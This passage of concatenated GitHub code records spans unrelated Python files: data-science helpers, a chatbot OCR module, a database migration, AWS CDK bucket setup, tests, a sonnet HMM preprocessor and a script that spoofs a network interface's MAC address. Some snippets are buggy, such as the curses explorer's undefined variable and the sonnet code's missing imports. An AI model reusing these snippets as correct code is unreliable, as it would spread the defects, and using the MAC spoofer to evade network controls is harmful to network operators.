abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y, x+1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y+1, x-1, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y+1, x, :], (1, np.shape(sub)[2])))),\n abs(spectral.spectral_angles(new_spectra, np.reshape(sub[y+1, x+1,:], (1, np.shape(sub)[2]))))]\n\n spectral_map[y, x] = np.mean(tmp)\n\n return spectral_map\n\n\n# path = 'C:/Users/swift/Desktop/Data/test/SkinAbs G927691_corrected.hdr'\n# sa = calculate_spectral_angles(path, 300, 150, 800, 200)\n# map = calculate_spectral_angles2(path, 300, 150, 800, 200)\n# print(map)\n","repo_name":"JulietteV/hsi","sub_path":"python/spectral_library.py","file_name":"spectral_library.py","file_ext":"py","file_size_in_byte":4764,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"36396172067","text":"import copy\nimport json\nimport re\nfrom dataclasses import dataclass, field\nfrom datetime import timedelta\nfrom pathlib import Path\nfrom typing import List\n\nimport zhconv\n\nfrom ..baidu_ocr import ocr_text\nfrom ..player_info.query import get_uid_by_qid\nfrom ..util import cache, get_config, get_path, gh_json, init_db, process\nfrom .collect_sheet import remove_special_char, achievements_sheet\nfrom .proxy_url import proxy_url\n\nconfig = get_config()\ndb = init_db(config.cache_dir, 'achievement.sqlite')\nlocal_dir = Path(get_path('achievement'))\n\nwith open(local_dir / 'fix_word.json', 'r', encoding=\"utf-8\") as fp:\n FIX_WORD = json.load(fp)\n\n\n@cache(ttl=timedelta(hours=24))\nasync def gh_fix_word():\n return await gh_json('achievement/fix_word.json')\n\n\n@dataclass\nclass Info:\n uid: int = 0\n completed: List[str] = field(default_factory=list)\n\n\nWORD_REPLACE = {}\n\n\nclass achievement:\n qq: int\n info: Info\n\n def __init__(self, qq):\n self.qq = str(qq)\n\n if process(self.qq).is_run():\n raise Exception('正在处理中...')\n uid = get_uid_by_qid(self.qq)\n if not uid:\n raise Exception('请先使用查询游戏UID功能进行绑定')\n\n info = db.get(self.qq, {}).get(uid)\n\n self.info = info and Info(**info) or Info(uid=uid)\n\n self.run = process(self.info.uid).start()\n\n async def save_data(self, data):\n if not db.get(self.qq):\n db[self.qq] = {self.info.uid: data}\n else:\n new_data = db[self.qq]\n new_data[self.info.uid] = data\n db[self.qq] = new_data\n\n async def clear_data(self):\n await self.save_data({})\n\n async def 
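The Info dataclass above uses field(default_factory=list) so that every instance gets its own list (a bare `completed: List[str] = []` is rejected by the dataclasses module, since that list would be shared). The behavior it buys, illustrated with a hypothetical Point class:

```python
from dataclasses import dataclass, field
from typing import List

@dataclass
class Point:
    tags: List[str] = field(default_factory=list)   # fresh list per instance

a, b = Point(), Point()
a.tags.append("x")
print(b.tags)   # [] , no state shared between instances
```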
form_img_list(self, img_list):\n try:\n all_achievement = await achievements_sheet()\n all_keys = all_achievement.keys()\n completed = set(self.info.completed)\n old_completed_len = len(completed)\n ocr_success = []\n for img_url in img_list:\n result = await ocr_text(img_url=img_url)\n ocr_count = 0\n for word in result.words_result:\n word = word.words.strip()\n word = zhconv.convert(word, 'zh-hans').strip('“”') # 转换简体字\n local_fix = FIX_WORD.get(word)\n\n if not local_fix: # 如果本地没有修复的词, 就使用github上的\n gh_fix = await gh_fix_word()\n word = gh_fix.get(word, word)\n else:\n word = local_fix\n\n word = remove_special_char(word)\n\n if len(word) == 1:\n continue\n\n if word == '达成':\n continue\n\n match_count = re.search(r'^\\d+/\\d+$', word)\n match_date = re.search(r'^\\d+/\\d+/\\d+$', word)\n if match_count or match_date:\n continue\n\n for v in WORD_REPLACE.items():\n word = word.replace(*v)\n\n word_filter = list(filter(lambda s: word in s, all_keys))\n if word_filter:\n ocr_count += 1\n completed.add(all_achievement[word_filter[0]].name)\n ocr_success.append(ocr_count)\n self.info.completed = list(completed)\n\n await self.save_data(self.info.__dict__)\n\n self.run.ok()\n return ocr_success, len(self.info.completed) - old_completed_len\n except Exception as e:\n self.run.ok()\n raise e\n\n async def from_proxy_url(self, url_list):\n try:\n img_list, failed_list = await proxy_url(url_list)\n ocr_success, added_len = await self.form_img_list(img_list)\n return failed_list, ocr_success, added_len\n except Exception as e:\n self.run.ok()\n raise e\n\n @property\n async def unfinished(self):\n try:\n all_achievement = copy.copy(await achievements_sheet())\n all_keys = all_achievement.keys()\n\n for name in self.info.completed:\n name = remove_special_char(name)\n if name in all_keys:\n del all_achievement[name]\n self.run.ok()\n return all_achievement.values()\n except Exception as e:\n self.run.ok()\n raise e\n","repo_name":"pcrbot/erinilis-modules","sub_path":"egenshin/achievement/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4488,"program_lang":"python","lang":"en","doc_type":"code","stars":144,"dataset":"github-code","pt":"53"} +{"seq_id":"9888328297","text":"\"\"\"add columns start_time and end_time.\n\nRevision ID: f4eed4c26e2c\nRevises: 42add02bf976\nCreate Date: 2021-12-20 13:18:31.122983\n\n\"\"\"\nimport sqlalchemy as sa\nfrom alembic import op\nfrom sqlalchemy import inspect\n\n# revision identifiers, used by Alembic.\nrevision = \"f4eed4c26e2c\"\ndown_revision = \"42add02bf976\"\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n inspector = inspect(op.get_bind())\n has_tables = inspector.get_table_names()\n\n if \"runs\" in has_tables:\n columns = [x.get(\"name\") for x in inspector.get_columns(\"runs\")]\n with op.batch_alter_table(\"runs\") as batch_op:\n if \"start_time\" not in columns:\n batch_op.add_column(sa.Column(\"start_time\", sa.Float))\n if \"end_time\" not in columns:\n batch_op.add_column(sa.Column(\"end_time\", sa.Float))\n\n\ndef downgrade():\n inspector = inspect(op.get_bind())\n has_tables = inspector.get_table_names()\n if \"runs\" in has_tables:\n columns = [x.get(\"name\") for x in inspector.get_columns(\"runs\")]\n\n with op.batch_alter_table(\"runs\") as batch_op:\n if \"start_time\" in columns:\n batch_op.drop_column(\"start_time\")\n if \"end_time\" in columns:\n 
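# --- Editor's annotation (not part of the dataset record above) ---
# Hedged sketch: the two re.search() patterns in form_img_list() above drop OCR
# noise such as progress counters ("3/10") and dates ("2021/1/5") before the
# words are matched against achievement names. A standalone check of that filter:
import re

def is_ocr_noise(word):
    return bool(re.search(r'^\d+/\d+$', word) or re.search(r'^\d+/\d+/\d+$', word))

assert is_ocr_noise('3/10') and is_ocr_noise('2021/1/5')
assert not is_ocr_noise('wanderer')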
batch_op.drop_column(\"end_time\")\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster/dagster/_core/storage/alembic/versions/024_add_columns_start_time_and_end_time_sqlite.py","file_name":"024_add_columns_start_time_and_end_time_sqlite.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"16571041538","text":"import curses\nimport os\n\n\ndef go_back(stdstr):\n stdstr.clear()\n str1 = os.getcwd()\n current_dir = str1.split('/')\n current_dir.pop()\n separator = '/'\n directory = separator.join(current_dir)\n stdstr.refresh()\n \ncwd = os.getcwd()\nprint((cwd))\n# print(\"Path at terminal when executing this file\")\n# print(os.getcwd() + \"\\n\")\n#\n# print(\"This file path, relative to os.getcwd()\")\n# print(__file__ + \"\\n\")\n#\n# print(\"This file full path (following symlinks)\")\n# full_path = os.path.realpath(__file__)\n# print(full_path + \"\\n\")\n#\n# print(\"This file directory and name\")\n# path, filename = os.path.split(full_path)\n# print(path + ' --> ' + filename + \"\\n\")\n#\n# print(\"This file directory only\")\n# print(os.path.dirname(full_path))\n\n\ndef print_dir(stdscr, selected_row_idx):\n stdscr.clear()\n list_dir = os.listdir()\n cwd = os.getcwd()\n h, w = stdscr.getmaxyx()\n\n stdscr.addstr(0, 0, cwd)\n for idx, row in enumerate(list_dir):\n y = len(list_dir)//2 + idx\n x = 5\n if idx == selected_row_idx:\n stdscr.attron(curses.color_pair(1))\n stdscr.addstr(y, x, row)\n stdscr.attroff(curses.color_pair(1))\n else:\n stdscr.addstr(y, x, row)\n\n stdscr.refresh()\n\n\ndef main(stdscr):\n curses.curs_set(0)\n curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)\n current_row_idx = 0\n\n print_dir(stdscr, current_row_idx)\n\n while 1:\n key = stdscr.getch()\n\n stdscr.clear()\n\n if key == curses.KEY_UP and current_row_idx > 0:\n current_row_idx -= 1\n elif key == curses.KEY_UP and current_row_idx == 0:\n current_row_idx = len(list_dir) - 1\n elif key == curses.KEY_DOWN and current_row_idx < len(list_dir) - 1:\n current_row_idx += 1\n elif key == curses.KEY_DOWN and current_row_idx == len(list_dir) - 1:\n current_row_idx = 0\n elif key == curses.KEY_ENTER or key in [10, 13]:\n go_back()\n # stdscr.getch()\n\n stdscr.refresh()\n\n\ncurses.wrapper(main)\n","repo_name":"Jspriddy/Pycharm-projects","sub_path":"curses/os/file_explorer.py","file_name":"file_explorer.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73522009767","text":"import aws_cdk as cdk\nimport aws_cdk.aws_s3 as s3\nimport aws_cdk.aws_iam as iam\nfrom .customized_parameters import (\n deployment_id,\n s3_retention_period,\n bucket_name_suffix,\n)\nfrom constructs import Construct\nfrom aws_cdk import (\n RemovalPolicy,\n Duration,\n)\n\n\ndef get_all_s3_buckets(scope: Construct):\n \"\"\"\n\n :param scope:\n :return:\n \"\"\"\n buckets = []\n bucket_names = [\n \"apisec\", \"audit\", \"configuration\", \"engine-logs\", \"imports\", \"kics-metadata\", \"kics-worker\", \"logs\",\n \"misc\", \"queries\", \"redis-shared-bucket\", \"report-templates\", \"reports\", \"repostore\", \"sast-metadata\",\n \"sast-worker\", \"sca-worker\", \"scan-results-storage\", \"scans\", \"source-resolver\", \"uploads\"\n ]\n\n for index, name in enumerate(bucket_names):\n bucket = s3.Bucket(\n scope=scope,\n id=\"-\".join([\"bucket\", str(index)]),\n 
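# --- Editor's annotation (not part of the dataset record above) ---
# Hedged sketch: in the curses file-explorer record above, main() uses a
# `list_dir` name it never defines and calls go_back() without the screen
# argument its signature requires. A corrected event loop, reusing the
# record's print_dir() and go_back() and keeping its key bindings:
import curses
import os

def main_fixed(stdscr):
    curses.curs_set(0)
    curses.init_pair(1, curses.COLOR_BLACK, curses.COLOR_WHITE)
    current_row_idx = 0
    while True:
        list_dir = os.listdir()              # define the listing the handlers need
        print_dir(stdscr, current_row_idx)
        key = stdscr.getch()
        if not list_dir:
            continue
        if key == curses.KEY_UP:
            current_row_idx = (current_row_idx - 1) % len(list_dir)
        elif key == curses.KEY_DOWN:
            current_row_idx = (current_row_idx + 1) % len(list_dir)
        elif key in (curses.KEY_ENTER, 10, 13):
            go_back(stdscr)                  # pass the screen, as go_back() expects

# curses.wrapper(main_fixed)  # same entry point the record uses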
access_control=s3.BucketAccessControl.PRIVATE,\n auto_delete_objects=True,\n block_public_access=s3.BlockPublicAccess.BLOCK_ALL,\n bucket_name=\"-\".join([name, bucket_name_suffix]),\n encryption=s3.BucketEncryption.S3_MANAGED,\n enforce_ssl=True,\n versioned=False,\n lifecycle_rules=[\n s3.LifecycleRule(\n enabled=True,\n id=\"Transition-To-Intelligent-Tiering\",\n transitions=[\n s3.Transition(\n storage_class=s3.StorageClass.INTELLIGENT_TIERING,\n transition_after=Duration.days(0)\n ),\n ]\n ),\n s3.LifecycleRule(\n id=\"-\".join([str(s3_retention_period), \"Days-Non-Current-Expiration\"]),\n enabled=True,\n abort_incomplete_multipart_upload_after=Duration.days(1),\n noncurrent_version_expiration=Duration.days(s3_retention_period),\n expired_object_delete_marker=True,\n )\n ],\n object_ownership=s3.ObjectOwnership.BUCKET_OWNER_PREFERRED,\n removal_policy=RemovalPolicy.DESTROY,\n )\n bucket.add_to_resource_policy(iam.PolicyStatement(\n sid=\"denyInsecureTransport\",\n effect=iam.Effect.DENY,\n principals=[iam.AnyPrincipal()],\n actions=[\"s3:*\"],\n resources=[bucket.bucket_arn, bucket.arn_for_objects('*')],\n conditions={\n \"Bool\": {\n \"aws:SecureTransport\": \"false\"\n }\n }\n ))\n cdk.Tag(key=\"Name\", value=f\"{deployment_id} {name} bucket\").visit(bucket)\n cdk.Tag(key=\"Environment\", value=f\"{deployment_id}\").visit(bucket)\n buckets.append(bucket)\n return buckets\n","repo_name":"HappyY19/cxone-cloudformation","sub_path":"cxone_cloudformation/s3_buckets.py","file_name":"s3_buckets.py","file_ext":"py","file_size_in_byte":2840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23727235047","text":"\nimport time\nimport pika\npath = 'F:\\office2\\mcxSender\\MCX_20170829 - Copy.rt'\ninfile = open(path,'r')\n\n#queue\nconnection = pika.BlockingConnection(pika.ConnectionParameters(host='localhost'))\nchannel = connection.channel()\nchannel.queue_declare(queue='hello')\n\nwhile True:\n for line in infile.readlines():\n try:\n split = line.split(',')\n if len(split)>1:#if condition is used so that the we dont split the blank line.\n client = split[19].strip() \n #if 'M04223' == client: \n tradeno = split[0].strip()\n comdty = split[4].strip()\n #date1 = split[5].strip()\n side = 'SELL'\n if split[15].strip() == '1':\n side = 'BUY' \n qty = split[16].strip() \n price = split[17].strip() \n expiry = split[5].strip()\n tradetime = split[24].strip()\n msg = tradetime + \"-\"+ tradeno + \"-\"+client + \"-\" + comdty +'-' +expiry+\"-\" + side + '-' + qty + '-' +price \n localtime = time.localtime(time.time()) \n print(\"msg routed :\" + msg)\n channel.basic_publish(exchange='',\n routing_key='hello',\n body=msg)\n except IndexError:\n pass \n time.sleep(0.50)\n \nprint('end of while reached')\nconnection.close() #closing rabbitmq connection \nprint('rabbitmq connection closed')\n\n \n","repo_name":"outboxsol/15Sep2017","sub_path":"mcxSender/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":1575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"42191957261","text":"#!/usr/bin/env python3\n\nimport subprocess\n\nfrom optparse import OptionParser\n\nimport re\n\n\ndef get_arguments():\n parser = OptionParser()\n parser.add_option(\"-i\", \"--interface\", dest=\"interface\",\n help=\"The name of the interface or network adapter you are looking to manipulate.\\n\"\n \"Default mac will be set to 00:11:22:33:44:55 (if no mac-address is specified).\"\n , 
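# --- Editor's annotation (not part of the dataset record above) ---
# Hedged usage sketch for get_all_s3_buckets() above: the function expects to
# be called from a Stack constructor. `BucketStack` and the app wiring are
# illustrative names, not from the original repo, and the module-level
# customized_parameters imports must resolve for this to synthesize.
import aws_cdk as cdk
from constructs import Construct

class BucketStack(cdk.Stack):
    def __init__(self, scope: Construct, construct_id: str, **kwargs) -> None:
        super().__init__(scope, construct_id, **kwargs)
        self.buckets = get_all_s3_buckets(self)  # defined in the module above

app = cdk.App()
BucketStack(app, "bucket-stack")
app.synth()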
metavar=\"argument\")\n parser.add_option(\"-m\", \"--mac\", dest=\"new_mac\",\n help=\"Specify 'new' mac-address you would like to set, You MUST specify an interface beforehand.\"\n , metavar=\"argument\")\n\n (options, arguments) = parser.parse_args()\n\n if not options.interface:\n # no error\n parser.error(\"[-] Please specify an interface, use --help for more info.\")\n elif not options.new_mac:\n # no error\n parser.error(\"[-] Please specify a mac address, use --help for more info.\")\n return options\n\n\ndef change_mac(interface, new_mac):\n if new_mac:\n print(\"\\n[+] Changing MAC for interface: \" + interface + \" to \" + new_mac + \"\\n\")\n subprocess.run([\"sudo\", \"ifconfig\", interface, \"down\"])\n subprocess.run([\"sudo\", \"ifconfig\", interface, \"hw\", \"ether\", new_mac])\n subprocess.run([\"sudo\", \"ifconfig\", interface, \"up\"])\n # subprocess.run([\"sudo\", \"ifconfig\", interface])\n\n\ndef get_mac(interface):\n ifconfig_result = subprocess.check_output([\"ifconfig\", interface])\n ifconfig_search = str(ifconfig_result)\n search_output = re.search(\"\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w:\\w\\w\", ifconfig_search)\n\n if search_output:\n return search_output.group(0)\n else:\n print(\"[-] Could not read MAC Address.\")\n\n# Getting user inputs\n\n\noptions = get_arguments()\ncurrent_mac = get_mac(options.interface)\nprint(\"\\n[*] Current MAC is: \" + str(current_mac))\n\n# Changing the mac address\nchange_mac(options.interface, options.new_mac)\n\n# Displaying output for user\ncurrent_mac = get_mac(options.interface)\nif current_mac == options.new_mac:\n print(\"[+] MAC address has been changed to :\" + current_mac)\nelse:\n print(\"[-] MAC address did not change.\")\n\n","repo_name":"XGKCode/Henrique","sub_path":"mac-changer.py","file_name":"mac-changer.py","file_ext":"py","file_size_in_byte":2198,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17888883367","text":"from pathlib import Path\nfrom subprocess import check_output, CalledProcessError\nfrom typing import List, Union\n\nimport numpy as np\n\n\nclass SpikeSortingError(RuntimeError):\n \"\"\"Raised whenever spike sorting fails\"\"\"\n\n\ndef get_bash_path():\n \"\"\"Return path to existing bash install.\"\"\"\n try:\n return check_output([\"which bash\"], shell=True).decode().strip(\"\\n\")\n except CalledProcessError as e:\n raise Exception(\"Bash is not installed or accessible on your system.\")\n\n\ndef get_matlab_shell_name():\n \"\"\"Return name of shell program used by MATLAB.\n\n As per MATLAB docs:\n 'On UNIX, MATLAB uses a shell program to execute the given command. It\n determines which shell program to use by checking environment variables on\n your system. MATLAB first checks the MATLAB_SHELL variable, and if either\n empty or not defined, then checks SHELL. 
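# --- Editor's annotation (not part of the dataset record above) ---
# Hedged sketch: the MAC-changer record above extracts the address from
# ifconfig output with a "\w\w:..." regex. A quick standalone check of
# that pattern:
import re

MAC_RE = re.compile(r"\w\w:\w\w:\w\w:\w\w:\w\w:\w\w")
assert MAC_RE.search("ether 00:11:22:33:44:55 txqueuelen 1000")
assert MAC_RE.search("no address in this line") is None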
If SHELL is also empty or not\n defined, MATLAB uses /bin/sh'\n \"\"\"\n try:\n # Either of \"\", \"bash\", \"zsh\", \"fish\",...\n # CalledProcessError if not defined\n matlab_shell_name = check_output([\"which $MATLAB_SHELL\"], shell=True).decode().strip(\"\\n\").split(\"/\")[-1]\n return matlab_shell_name\n except CalledProcessError as e:\n pass\n try:\n # Either of \"\", \"bash\", \"zsh\", \"fish\",...\n # CalledProcessError if not defined\n df_shell_name = check_output([\"which $SHELL\"], shell=True).decode().strip(\"\\n\").split(\"/\")[-1]\n return df_shell_name\n except CalledProcessError as e:\n pass\n return \"sh\"\n\n\ndef get_git_commit(git_folder, shorten=True):\n \"\"\"\n Get commit to generate sorters version.\n \"\"\"\n if git_folder is None:\n return None\n try:\n commit = check_output([\"git\", \"rev-parse\", \"HEAD\"], cwd=git_folder).decode(\"utf8\").strip()\n if shorten:\n commit = commit[:12]\n except:\n commit = None\n return commit\n\n\ndef has_nvidia():\n \"\"\"\n Checks if the machine has nvidia capability.\n \"\"\"\n\n try:\n from cuda import cuda\n except ModuleNotFoundError as err:\n raise Exception(\n \"This sorter requires cuda, but the package 'cuda-python' is not installed. You can install it with:\\npip install cuda-python\"\n ) from err\n\n try:\n (cu_result_init,) = cuda.cuInit(0)\n cu_result, cu_string = cuda.cuGetErrorString(cu_result_init)\n cu_result_device_count, device_count = cuda.cuDeviceGetCount()\n return device_count > 0\n except RuntimeError: # Failed to dlopen libcuda.so\n return False\n","repo_name":"SpikeInterface/spikeinterface","sub_path":"src/spikeinterface/sorters/utils/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":318,"dataset":"github-code","pt":"53"} +{"seq_id":"4831841152","text":"import pytest\n\nfrom edne_correios_loader.table_set import (\n TableSetEnum,\n get_cep_tables,\n get_table_files_glob,\n)\n\n\ndef test_get_cep_tables():\n assert get_cep_tables() == [\n \"cep_unificado\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_logradouro\",\n \"log_grande_usuario\",\n \"log_unid_oper\",\n ]\n\n\ndef test_get_tables_files_glob():\n assert get_table_files_glob(\"log_faixa_uf\") == \"LOG_FAIXA_UF.TXT\"\n assert get_table_files_glob(\"log_logradouro\") == \"LOG_LOGRADOURO_*.TXT\"\n assert get_table_files_glob(\"cep_unificado\") is None\n\n\n@pytest.mark.parametrize(\n \"table_set,tables_to_populate\",\n [\n (\n TableSetEnum.ALL_TABLES,\n [\n \"cep_unificado\",\n \"ect_pais\",\n \"log_faixa_uf\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_faixa_localidade\",\n \"log_var_loc\",\n \"log_faixa_bairro\",\n \"log_faixa_cpc\",\n \"log_logradouro\",\n \"log_var_bai\",\n \"log_grande_usuario\",\n \"log_num_sec\",\n \"log_unid_oper\",\n \"log_var_log\",\n \"log_faixa_uop\",\n ],\n ),\n (\n TableSetEnum.CEP_TABLES,\n [\n \"cep_unificado\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_logradouro\",\n \"log_grande_usuario\",\n \"log_unid_oper\",\n ],\n ),\n (\n TableSetEnum.UNIFIED_CEP_ONLY,\n [\n \"cep_unificado\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_logradouro\",\n \"log_grande_usuario\",\n \"log_unid_oper\",\n ],\n ),\n ],\n)\ndef test_table_set_to_populate(table_set, tables_to_populate):\n assert table_set.to_populate == tables_to_populate\n\n\n@pytest.mark.parametrize(\n \"table_set,tables_to_drop\",\n [\n (TableSetEnum.ALL_TABLES, []),\n (TableSetEnum.CEP_TABLES, []),\n (\n 
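# --- Editor's annotation (not part of the dataset record above) ---
# Hedged sketch: get_matlab_shell_name() above realises the documented
# MATLAB_SHELL -> SHELL -> /bin/sh fallback by shelling out with `which`.
# Roughly the same lookup can be done over os.environ without spawning
# subprocesses (this skips the `which` resolution step, so it is an
# approximation, not a drop-in replacement):
import os

def shell_name_from_env():
    for var in ("MATLAB_SHELL", "SHELL"):
        value = os.environ.get(var, "")
        if value:
            return value.split("/")[-1]
    return "sh"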
TableSetEnum.UNIFIED_CEP_ONLY,\n [\n \"ect_pais\",\n \"log_faixa_uf\",\n \"log_localidade\",\n \"log_bairro\",\n \"log_cpc\",\n \"log_faixa_localidade\",\n \"log_var_loc\",\n \"log_faixa_bairro\",\n \"log_faixa_cpc\",\n \"log_logradouro\",\n \"log_var_bai\",\n \"log_grande_usuario\",\n \"log_num_sec\",\n \"log_unid_oper\",\n \"log_var_log\",\n \"log_faixa_uop\",\n ],\n ),\n ],\n)\ndef test_table_set_to_drop(table_set, tables_to_drop):\n assert table_set.to_drop == tables_to_drop\n","repo_name":"cauethenorio/edne-correios-loader","sub_path":"tests/test_table_set.py","file_name":"test_table_set.py","file_ext":"py","file_size_in_byte":2953,"program_lang":"python","lang":"pt","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"26589892803","text":"\n###############################################################################\n# Preprocessing\n###############################################################################\n\ndef getAllWordsAndSequences(shakespeare_filename, syllable_dict_filename, syllable_count=False): \n import re \n \n # Load in syllable dictionary and save outputs into a dictionary\n with open(syllable_dict_filename) as f:\n syllable_dict_ = f.readlines()\n\n syllable_dict = {}\n\n for line in syllable_dict_:\n word = line.strip().split()[0]\n num = line.strip().split()[-1]\n syllable_dict[word] = num\n\n # Create a set of words from the syllable dictionary to match with\n # words from the sonnet parsing. \n syllable_words = set(syllable_dict.keys())\n \n with open(shakespeare_filename) as f:\n shakespeare = f.readlines()\n\n # Get start line of each sonnet \n p = re.compile('[\\d]+')\n start_indexes = []\n for i, line in enumerate(shakespeare): \n if p.match(line.strip()):\n start_indexes.append(i)\n \n # Parse each sonnet\n all_words = set()\n all_sequences = []\n for start_ind in start_indexes: \n # Iterate through each line in the sonnet (starts at index +1 to not use the line that has the number)\n for i, line in enumerate(shakespeare[start_ind+1: start_ind+15]): \n\n # Remove whitespace at start + end of line\n clean_line = line.strip()\n\n # Remove punctuation\n clean_line = clean_line.replace(',', '')\n clean_line = clean_line.replace(':', '')\n clean_line = clean_line.replace('\"', '')\n clean_line = clean_line.replace(';', '')\n clean_line = clean_line.replace('.', '')\n clean_line = clean_line.replace('(', '')\n clean_line = clean_line.replace(')', '')\n clean_line = clean_line.replace('!', '')\n clean_line = clean_line.replace('?', '')\n\n # Remove capitalization\n clean_line = clean_line.lower() \n\n # Create array of words\n clean_words = clean_line.split()\n\n # Create sequence\n sequence = [] \n for word in clean_words: \n if word not in syllable_words: \n # Sometimes words have extra apostrophes at the front and/or end of the word\n # that cause it not to appear in the syllable dict. This happens when \n # Shakespeare is quoting something like 'I hate' so we can strip the apostrophes\n # before adding the word\n word = word.strip(\"'\")\n\n all_words.add(word) \n sequence.append(word)\n\n # Add new-line word to signify end of line.\n sequence.append('\\n') \n # TODO: maybe we can have special end-of-line tokens to signify the line #, \n # or whether it is part of quatrain or couplet, or is the volta. \n\n # Add sequence to all sequences\n all_sequences.append(sequence)\n # XOR (i.e. 
all words not in the intersection of the two sets)\n # Should be empty set \n # print(\"Words that are not in intersection with syllable dictionary:\", syllable_words ^ all_words)\n \n # Word embeddings (assign every word an integer number) \n word_dict = {} \n for i, word in enumerate(all_words): \n word_dict[word] = i\n word_dict['\\n'] = i+1\n \n # Now, convert all_sonnets into integer representation\n all_sonnet_int = []\n for sonnet in all_sequences:\n current_sonnet = []\n for word in sonnet:\n current_sonnet.append(word_dict[word])\n all_sonnet_int.append(current_sonnet)\n \n if syllable_count:\n return all_words, all_sequences, word_dict, all_sonnet_int, syllable_dict\n \n return all_words, all_sequences, word_dict, all_sonnet_int\n\ndef sample_rev_sonents(hmm, obs_map, syllable_dict, n_sonnet=10, start_word=None):\n # Get reverse map.\n obs_map_r = obs_map_reverser(obs_map)\n start_state = None\n if start_word:\n emition_pos=[hmm.O[i][start_word] for i in range(hmm.L)]\n start_state=random.choices([i for i in range(hmm.L)],weights=emition_pos)[0]\n # Sample and convert sentence.\n emission = []\n states = []\n count_sonet = int(syllable_dict[obs_map_r[start_word]][-1])\n state=start_state\n# print(obs_map_r[start_word])\n\n for i in range(100):\n # Append state.\n states.append(state)\n while(True):\n\n # Sample next observation.\n rand_var = random.uniform(0, 1)\n next_obs = 0\n\n while rand_var > 0:\n rand_var -= hmm.O[state][next_obs]\n next_obs += 1\n\n next_obs -= 1\n emission.append(next_obs)\n if i!=0:\n count_sonet+=int(syllable_dict[obs_map_r[next_obs]][-1])\n if count_sonet==10:\n break\n elif count_sonet>10:\n count_sonet-=int(syllable_dict[obs_map_r[next_obs]][-1])\n emission.pop()\n continue\n else:\n break\n if count_sonet==10:\n break\n\n # Sample next state.\n rand_var = random.uniform(0, 1)\n next_state = 0\n\n while rand_var > 0:\n rand_var -= hmm.A[state][next_state]\n next_state += 1\n\n next_state -= 1\n state = next_state\n sentence = [obs_map_r[i] for i in emission]\n \n if start_word:\n sentence[0]=obs_map_r[start_word]\n\n return ' '.join(sentence[::-1]).capitalize()\n\ndef count_syllables(word):\n \"\"\"\n Taken from syllapy package: https://github.com/mholtzscher/syllapy\n \"\"\"\n syllable_count = 0\n vowels = 'aeiouy'\n if word[0] in vowels:\n syllable_count += 1\n for index in range(1, len(word)):\n if word[index] in vowels and word[index - 1] not in vowels:\n syllable_count += 1\n if word.endswith('e'):\n syllable_count -= 1\n if word.endswith('le') and len(word) > 2 and word[-3] not in vowels:\n syllable_count += 1\n if syllable_count == 0:\n syllable_count += 1\n return syllable_count\n\ndef addSpenserData(spenser_fn, all_words_, all_sequences_, word_dict_, all_sonnet_int_, syllable_dict_):\n \"\"\"\n Takes in spenser filename and adds spenser data to existing structures in same format. 
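# --- Editor's annotation (not part of the dataset record above) ---
# Hedged sketch: count_syllables() above is the syllapy vowel-group heuristic,
# so it is approximate rather than dictionary-accurate. A few spot checks:
for word, expected in [("sonnet", 2), ("love", 1), ("beauty", 2)]:
    assert count_syllables(word) == expected  # uses the function defined above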
\n \"\"\"\n \n # Not ideal, but prevents updating original\n all_words_ = all_words_.copy()\n shake_words = all_words_.copy()\n all_sequences_ = all_sequences_.copy()\n word_dict_ = word_dict_.copy()\n all_sonnet_int_ = all_sonnet_int_.copy()\n syllable_dict_ = syllable_dict_.copy()\n start_idx = len(all_words_)\n\n with open(spenser_fn) as f:\n spenser = f.readlines()\n \n # Regular expression to catch Roman numerals\n p = re.compile(\"^(?=[MDCLXVI])M*(C[MD]|D?C{0,3})(X[CL]|L?X{0,3})(I[XV]|V?I{0,3})$\")\n start_indexes = []\n for i, line in enumerate(spenser): \n if p.match(line.strip()):\n start_indexes.append(i)\n new_words = set()\n new_sequences = []\n for start_ind in start_indexes: \n # Iterate through each line in the sonnet (starts at index +2 to not use the line that has the number)\n for i, line in enumerate(spenser[start_ind+2: start_ind+16]): \n\n # Remove whitespace at start + end of line\n clean_line = line.strip()\n\n # Remove punctuation\n clean_line = clean_line.replace(',', '')\n clean_line = clean_line.replace(':', '')\n clean_line = clean_line.replace('\"', '')\n clean_line = clean_line.replace(';', '')\n clean_line = clean_line.replace('.', '')\n clean_line = clean_line.replace('(', '')\n clean_line = clean_line.replace(')', '')\n clean_line = clean_line.replace('!', '')\n clean_line = clean_line.replace('?', '')\n\n # Remove capitalization\n clean_line = clean_line.lower() \n\n # Create array of words\n clean_words = clean_line.split()\n\n # Create sequence\n sequence = []\n for word in clean_words: \n all_words_.add(word) \n sequence.append(word)\n new_words.add(word)\n sequence.append('\\n')\n all_sequences_.append(sequence)\n new_sequences.append(sequence)\n \n for i, word in enumerate(new_words - shake_words):\n word_dict_[word] = i + start_idx\n\n # Now, convert all_sonnets into integer representation\n for sonnet in new_sequences:\n current_sonnet = []\n for word in 